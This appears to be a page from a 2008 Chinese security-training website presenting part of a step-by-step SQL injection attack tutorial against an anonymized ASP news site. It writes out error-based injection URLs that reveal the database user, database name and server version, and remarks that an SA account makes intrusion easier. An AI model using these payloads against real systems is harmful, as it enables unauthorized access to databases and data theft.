首页 实地培训 VIP专区 文章中心 下载中心 精品动画 安全服务 安全产品 企业文化
技术论坛
 -->开创网络首先基于以学员为中心的人性化教学方式。以案例式教学、互动式教学为主线。
 
  当前位置: 首页 > 文章中心 > 攻防实战 >
 
 
实例讲解跨站入侵攻防战之攻击篇
发布者ID:3 作者: 发布时间:2008-05-23 00:30:03 来源: 点击:
 

  回车后出现“BOF或EOF中有一个是真,或者当前的记录已经被删除,所需要的操作要求一个当前的记录”的错误提示,这进一步证明了SQL注入的可操作性。(如图4)

               Highslide JS

                                                             图4

  第五步:接下来我们来通过SQL注入语言让页面告诉我们当前连接该SQL SERVER数据库的帐户信息,通过输入

XXX/news_show.asp?wt_id=25 and user>0

  回车来检测,页面提示出错,信息为“

Microsoft odbc sql server driver将nvarchar值AAA转换为数据类型为int的列时发生语法错误

。这说明了AAA帐户就是当前连接该SQL SERVER数据库的用户。(如图5)

               Highslide JS

                                                        图5

  小提示:

  如果通过该指令进行SQL注入时出错信息为将nvarchar值dbo转换为数据类型为int的列时发生语法错误,那么说明当前连接该数据库的帐户为SA帐户,这个帐户的权限是巨大的,我们入侵将变得更加容易,SA帐户就等于服务器上操作系统的administrator管理员权限。

  第六步:接下来我们来测试当前AAA帐户连接的数据库名称是什么,输入

http://xxx/news_show.asp?wt_id=25 and db_name()>0

  ,错误提示为——

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将nvarchar值 'BBB'

  转换为数据类型为int的列时发生语法错误。 这说明当前AAA帐户连接的数据库名称为BBB。(如图6)

               Highslide JS

                                                           图6

  第七步:我们继续来判断目标网站数据库类型和版本,通过输入

http://xxx/news_show.asp?wt_id=25 and 1=(select @@VERSION)

  ,显示错误提示为——

<>


上一页 1 2 3 4 下一页

 
 
 
 
   
 
   
     
  • 课堂实景
  • 课程体系
  • 培训课程
  • 学费介绍
  • 巧用mstsc命令登录到console的方法
  • 课程介绍
  • 团队介绍
  • Linkideo免费Vpn
  • 就业前景
  • 汇款方式
  •  
     
     
    无标题文档
    一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网
      关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 友情链接  
      版权所有:吉林省开创科技信息有限公司  
      服务热线:0431-84714442
    Copyright 2001 - 2007 All Rights Reserved